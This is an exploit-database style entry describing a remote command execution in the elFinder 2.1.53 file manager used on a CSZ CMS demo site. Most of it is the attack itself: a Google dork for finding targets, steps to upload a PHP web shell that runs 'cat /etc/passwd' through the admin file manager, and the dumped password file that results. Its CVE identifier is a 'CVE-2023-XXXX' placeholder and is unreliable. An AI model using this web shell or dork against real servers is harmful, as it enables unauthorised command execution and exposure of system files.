elFinder Web file manager Version: 2.1.53 Remote Command Execution

vendor:

elFinder Web File Manager

by:

tmrswrr

6.1

CVSS

HIGH

Remote Command Execution

CWE

Product Name: elFinder Web File Manager

Affected Version From: 2.1.53

Affected Version To: 2.1.53

Patch Exists: YES

Related CWE: CVE-2023-XXXX

CPE: a:studio-42:elfinder:2.1.53

Metasploit:

Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/, https://www.infosecmatter.com/nessus-plugin-library/?id=75129, https://www.infosecmatter.com/nessus-plugin-library/?id=11068

Platforms Tested: https://www.softaculous.com/apps/cms/CSZ_CMS

2023

elFinder Web file manager Version: 2.1.53 Remote Command Execution

The elFinder web file manager version 2.1.53 is vulnerable to remote command execution. By uploading a PHP file containing a system command, an attacker can execute arbitrary commands on the server. This can lead to unauthorized access, data theft, and further exploitation of the target system. This vulnerability is tracked as CVE-2023-XXXX.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of elFinder. Additionally, restrict access to the file manager to trusted users only and sanitize file uploads to prevent execution of arbitrary commands.

Source

Exploit-DB raw data:

# Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution
# Date: 23/11/2023
# Exploit Author: tmrswrr
# Google Dork: intitle:"elFinder 2.1.53"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip
# Version: 2.1.53
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager
2 ) Click Template Main and upload this test.php file :

<?php echo system('cat /etc/passwd'); ?>

3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false